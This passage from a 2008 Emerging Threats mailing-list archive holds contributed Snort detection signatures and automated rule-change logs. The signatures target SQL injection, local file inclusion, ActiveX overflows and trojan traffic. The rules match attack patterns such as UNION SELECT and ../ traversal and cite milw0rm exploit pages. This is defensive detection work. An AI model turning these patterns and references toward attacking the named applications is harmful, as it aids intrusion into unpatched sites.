hqsbGjLvXkep3vurJtnh6bILH8pUhkbEXnpoJuZka7NwV+GT3+DEfvFA4yIdCde9 o59wNMQMIEJqp/gUcmfLCxtQ0cqAk1FCrS8Ge34Pvp1K+V5G4CvDVaOX5hjVG5f1 JQBdapHNLcq7g630b8s0D1m6rcEdZLhnXz8uMjBgGmSLY+4AbrTHvBE7C2BPoCcO F152u/Ixy7lMt8ec9A39P2/2q8WFN9rOQ5axMs0zsyJb2z/OGIhN44dl3xgl3fm5 BrpcINC89bc= =f3OM -----END PGP SIGNATURE----- From signatures at stillsecure.com Fri Oct 17 10:00:28 2008 From: signatures at stillsecure.com (signatures) Date: Fri, 17 Oct 2008 08:00:28 -0600 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> Hi Matt, Please find 6 New signatures below: 1. myEvent viewevent.php SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"myEvent viewevent.php SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/viewevent.php?eventdate="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31773; reference:url,www.milw0rm.com/exploits/6760; sid:8462; rev:1;) 2. AstroSPACES profile.php SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"AstroSPACES profile.php SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/profile.php?"; nocase; uricontent:"id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31771; reference:url,www.milw0rm.com/exploits/6758; sid:8463; rev:1;) 3. SweetCMS page SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SweetCMS page SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"index.php?page="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32277/; reference:url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt; sid:8464; rev:1;) 4. Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; content:"PlainTextPassword"; nocase; classtype:successful-user; reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; sid:8465; rev:1;) 5. Sports Clubs Web Panel p Parameter Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Sports Clubs Web Panel p Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/index.php?p="; nocase; pcre:"/(\.\.\/){1,}/"; classtype: web-application-attack; reference:url,www.frsirt.com/english/advisories/2008/2550; reference:url,www.milw0rm.com/exploits/6427; sid:8466; rev:1;) 6. My PHP Dating id parameter SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"My PHP Dating id parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/success_story.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype: web-application-attack; reference:url,secunia.com/advisories/32268; reference:url,www.milw0rm.com/exploits/6754; sid:8467; rev:1;) Looking forward for your comments if any on this week rules posted... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081017/2dc1f2bb/attachment.html From jonkman at jonkmans.com Fri Oct 17 14:12:32 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 17 Oct 2008 14:12:32 -0400 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> Message-ID: <48F8D590.7060806@jonkmans.com> Very nice! Posting now. Many thanks to Stillsecure!! Matt signatures wrote: > Hi Matt, > > > Please find 6 New signatures below: > > > > *1. **myEvent viewevent.php SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"myEvent > viewevent.php SQL Injection"; flow:established,to_server; content:"GET > "; depth:4; uricontent:"/viewevent.php?eventdate="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,31773; reference:url,www.milw0rm.com/exploits/6760; > sid:8462; rev:1;) > > > > *2. **AstroSPACES profile.php SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS > (msg:"AstroSPACES profile.php SQL Injection"; > flow:established,to_server; content:"GET "; depth:4; > uricontent:"/profile.php?"; nocase; uricontent:"id="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,31771; reference:url,www.milw0rm.com/exploits/6758; > sid:8463; rev:1;) > > > > *3. **SweetCMS page SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SweetCMS > page SQL Injection"; flow:established,to_server; content:"GET "; > depth:4; uricontent:"index.php?page="; nocase; pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack; > reference:url,secunia.com/Advisories/32277/; > reference:url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt; > sid:8464; rev:1;) > > > > *4. **Hummingbird HostExplorer ActiveX Control PlainTextPassword > Buffer Overflow * > > alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird > HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; > flow:to_client,established; content:"CLSID"; nocase; > content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; > content:"PlainTextPassword"; nocase; classtype:successful-user; > reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; > sid:8465; rev:1;) > > > > *5. **Sports Clubs Web Panel p Parameter Local File Inclusion * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Sports > Clubs Web Panel p Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/index.php?p="; nocase; pcre:"/(\.\.\/){1,}/"; classtype: > web-application-attack; > reference:url,www.frsirt.com/english/advisories/2008/2550; > reference:url,www.milw0rm.com/exploits/6427; sid:8466; rev:1;) > > > > *6. **My PHP Dating id parameter SQL Injection * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"My PHP > Dating id parameter SQL Injection"; flow:to_server,established; > content:"GET "; depth:4; uricontent:"/success_story.php?id="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype: web-application-attack; > reference:url,secunia.com/advisories/32268; > reference:url,www.milw0rm.com/exploits/6754; sid:8467; rev:1;) > > > Looking forward for your comments if any on this week rules posted... > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Fri Oct 17 14:20:15 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 17 Oct 2008 14:20:15 -0400 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> Message-ID: <48F8D75F.6060502@jonkmans.com> signatures wrote: > *4. **Hummingbird HostExplorer ActiveX Control PlainTextPassword > Buffer Overflow * > > alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird > HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; > flow:to_client,established; content:"CLSID"; nocase; > content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; > content:"PlainTextPassword"; nocase; classtype:successful-user; > reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; > sid:8465; rev:1;) Can we port limit this any? Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From signatures at stillsecure.com Fri Oct 17 15:43:56 2008 From: signatures at stillsecure.com (signatures) Date: Fri, 17 Oct 2008 13:43:56 -0600 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008 References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> <48F8D75F.6060502@jonkmans.com> Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290A@webmail.latis.com> The exploit is pretty vague but we should be able to narrow down the ports. Let us confirm and we will send you a update once we've tested it. Thanks & Regards, StillSecure -----Original Message----- From: Matt Jonkman [mailto:jonkman at jonkmans.com] Sent: Fri 10/17/2008 12:20 PM To: signatures Cc: emerging-sigs at emergingthreats.net Subject: Re: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008 signatures wrote: > *4. **Hummingbird HostExplorer ActiveX Control PlainTextPassword > Buffer Overflow * > > alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird > HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; > flow:to_client,established; content:"CLSID"; nocase; > content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; > content:"PlainTextPassword"; nocase; classtype:successful-user; > reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; > sid:8465; rev:1;) Can we port limit this any? Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081017/901de3b1/attachment.html From emerging at emergingthreats.net Fri Oct 17 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 17 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081017200008.1D76E4502B@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri Oct 17 16:00:08 2008 [***] [+++] Added rules: [+++] 2008667 - ET TROJAN Backdoor.Win32.Agent.fvt Checkin (emerging-virus.rules) 2008668 - ET WEB_SPECIFIC myEvent viewevent.php SQL Injection (emerging-web_sql_injection.rules) 2008669 - ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection (emerging-web_sql_injection.rules) 2008670 - ET WEB_SPECIFIC SweetCMS page SQL Injection (emerging-web_sql_injection.rules) 2008671 - ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2008672 - ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection (emerging-web_sql_injection.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (6): 2008667 || ET TROJAN Backdoor.Win32.Agent.fvt Checkin 2008668 || ET WEB_SPECIFIC myEvent viewevent.php SQL Injection || url,www.milw0rm.com/exploits/6760 || bugtraq,31773 2008669 || ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection || url,www.milw0rm.com/exploits/6758 || bugtraq,31771 2008670 || ET WEB_SPECIFIC SweetCMS page SQL Injection || url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt || url,secunia.com/Advisories/32277/ 2008671 || ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion || url,www.milw0rm.com/exploits/6427 || url,www.frsirt.com/english/advisories/2008/2550 2008672 || ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection || url,www.milw0rm.com/exploits/6754 || url,secunia.com/advisories/32268 -> Added to emerging-sid-msg.map.txt (6): 2008667 || ET TROJAN Backdoor.Win32.Agent.fvt Checkin 2008668 || ET WEB_SPECIFIC myEvent viewevent.php SQL Injection || url,www.milw0rm.com/exploits/6760 || bugtraq,31773 2008669 || ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection || url,www.milw0rm.com/exploits/6758 || bugtraq,31771 2008670 || ET WEB_SPECIFIC SweetCMS page SQL Injection || url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt || url,secunia.com/Advisories/32277/ 2008671 || ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion || url,www.milw0rm.com/exploits/6427 || url,www.frsirt.com/english/advisories/2008/2550 2008672 || ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection || url,www.milw0rm.com/exploits/6754 || url,secunia.com/advisories/32268 -> Added to emerging-virus.rules (1): #re 4bde1bc2f7b6d4e11b1a570aaa52df57 [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From jonkman at jonkmans.com Fri Oct 17 16:05:21 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 17 Oct 2008 16:05:21 -0400 Subject: [Emerging-Sigs] Signatures on Malware E-mail and XSS Attacks In-Reply-To: <48F895B8.1020706@secpod.com> References: <48F895B8.1020706@secpod.com> Message-ID: <48F8F001.1050004@jonkmans.com> Good sigs Veerendra. The ecard one is great, it should apply to many attacks for a very long time. Posting now, thanks Matt Veerendra GG wrote: > # 14/10/2008 Microsoft PicturePusher XSS > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Microsoft > PicturePusher ActiveX Cross Site File Upload Attack"; content:"clsid"; > nocase; content:"507813C3-0B26-47AD-A8C0-D483C7A21FA7"; nocase; > pcre:"/http\://.*?[\w]{4,}=1/i"; nocase; > pcre:"/(PostURL|AddSeperator|AddString|Post)/i"; nocase; > reference:url,milw0rm.com/exploits/6699; > classtype:web-application-attack; sid:9031; rev:1;) > > # 16/10/2008 eCard Email Malware Attack > alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"eCard email malware > attack - Trojan"; flow:established,to_server; content:"|0d 0a|Subject\: > You have received an eCard"; nocase; content:"e-card.zip"; nocase; > classtype:trojan-activity; > reference:url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/; > sid:9032; rev:1;) > > _______________________________________________ Emerging-sigs mailing list Emerging-sigs at emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Sat Oct 18 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 18 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081018200008.650A445026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 18 16:00:08 2008 [***] [+++] Added rules: [+++] 2008673 - ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack (emerging-exploit.rules) 2008674 - ET TROJAN Likely eCard Malware Laden Email Inbound (emerging-virus.rules) 2008675 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start (emerging-virus.rules) 2008676 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply (emerging-virus.rules) 2008677 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-exploit.rules (1): #by Veerendra at secpod -> Added to emerging-sid-msg.map (5): 2008673 || ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack || url,milw0rm.com/exploits/6699 2008674 || ET TROJAN Likely eCard Malware Laden Email Inbound || url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/ 2008675 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start 2008676 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply 2008677 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply -> Added to emerging-sid-msg.map.txt (5): 2008673 || ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack || url,milw0rm.com/exploits/6699 2008674 || ET TROJAN Likely eCard Malware Laden Email Inbound || url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/ 2008675 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start 2008676 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply 2008677 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply -> Added to emerging-virus.rules (2): #re c6f326609487aaae451366728ec5cdd9 #by Veerendra at secpod From emerging at emergingthreats.net Sat Oct 18 18:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 18 Oct 2008 18:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20081018220008.3BFF745026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 18 18:00:08 2008 [***] [+++] Added rules: [+++] 2008654 - ET SCAN SQLix SQL Injection Vector Scan (emerging-scan.rules) 2008655 - ET MALWARE Frequently Used Fake trojan downloader User Agent (emerging-malware.rules) 2008656 - ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) (emerging-malware.rules) 2008657 - ET MALWARE Suspicious User-Agent Detected (Compatible) (emerging-malware.rules) 2008658 - ET MALWARE Suspicious User-Agent Detected (GetUrlSize) (emerging-malware.rules) 2008659 - ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) (emerging-malware.rules) 2008660 - ET TROJAN Torpig Infection Reporting (emerging-virus.rules) 2008661 - ET TROJAN Zbot/Zeus HTTP POST (emerging-virus.rules) 2008662 - ET TROJAN Generic PSW Agent server reply (emerging-virus.rules) 2008663 - ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) (emerging-malware.rules) 2008664 - ET TROJAN Generic Dropper HTTP Bot grabbing config (emerging-virus.rules) 2008665 - ET TROJAN Obfiscator.vc or Related Infection Checkin (emerging-virus.rules) 2008666 - ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) (emerging-virus.rules) 2008667 - ET TROJAN Backdoor.Win32.Agent.fvt Checkin (emerging-virus.rules) 2008668 - ET WEB_SPECIFIC myEvent viewevent.php SQL Injection (emerging-web_sql_injection.rules) 2008669 - ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection (emerging-web_sql_injection.rules) 2008670 - ET WEB_SPECIFIC SweetCMS page SQL Injection (emerging-web_sql_injection.rules) 2008671 - ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2008672 - ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection (emerging-web_sql_injection.rules) 2008673 - ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack (emerging-exploit.rules) 2008674 - ET TROJAN Likely eCard Malware Laden Email Inbound (emerging-virus.rules) 2008675 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start (emerging-virus.rules) 2008676 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply (emerging-virus.rules) 2008677 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply (emerging-virus.rules) [///] Modified active rules: [///] 2008549 - ET MALWARE Systemdoctor.com/Antivir2008 related Fake Anti-Virus User-Agent (AntivirXP) (emerging-malware.rules) 2008640 - ET SCAN SIP erase_registrations/add registrations attempt (emerging-voip.rules) 2008646 - ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC (emerging.rules) 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-drop-BLOCK.rules (2): # VERSION 1330 # Generated 2008-10-18 00:03:02 EDT -> Added to emerging-drop.rules (2): # VERSION 1330 # Generated 2008-10-18 00:03:02 EDT -> Added to emerging-exploit.rules (1): #by Veerendra at secpod -> Added to emerging-malware.rules (3): #by jeremy conway # ref: 6bbaadcf801e9026d27521ae3f093fe0 # ref: 08e90268f52d942927c9f89fc9b796fb -> Added to emerging-sid-msg.map (24): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent 2008656 || ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) 2008657 || ET MALWARE Suspicious User-Agent Detected (Compatible) 2008658 || ET MALWARE Suspicious User-Agent Detected (GetUrlSize) 2008659 || ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) 2008660 || ET TROJAN Torpig Infection Reporting 2008661 || ET TROJAN Zbot/Zeus HTTP POST 2008662 || ET TROJAN Generic PSW Agent server reply 2008663 || ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) 2008664 || ET TROJAN Generic Dropper HTTP Bot grabbing config 2008665 || ET TROJAN Obfiscator.vc or Related Infection Checkin 2008666 || ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) 2008667 || ET TROJAN Backdoor.Win32.Agent.fvt Checkin 2008668 || ET WEB_SPECIFIC myEvent viewevent.php SQL Injection || url,www.milw0rm.com/exploits/6760 || bugtraq,31773 2008669 || ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection || url,www.milw0rm.com/exploits/6758 || bugtraq,31771 2008670 || ET WEB_SPECIFIC SweetCMS page SQL Injection || url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt || url,secunia.com/Advisories/32277/ 2008671 || ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion || url,www.milw0rm.com/exploits/6427 || url,www.frsirt.com/english/advisories/2008/2550 2008672 || ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection || url,www.milw0rm.com/exploits/6754 || url,secunia.com/advisories/32268 2008673 || ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack || url,milw0rm.com/exploits/6699 2008674 || ET TROJAN Likely eCard Malware Laden Email Inbound || url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/ 2008675 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start 2008676 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply 2008677 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply -> Added to emerging-sid-msg.map.txt (24): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project 2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent 2008656 || ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) 2008657 || ET MALWARE Suspicious User-Agent Detected (Compatible) 2008658 || ET MALWARE Suspicious User-Agent Detected (GetUrlSize) 2008659 || ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) 2008660 || ET TROJAN Torpig Infection Reporting 2008661 || 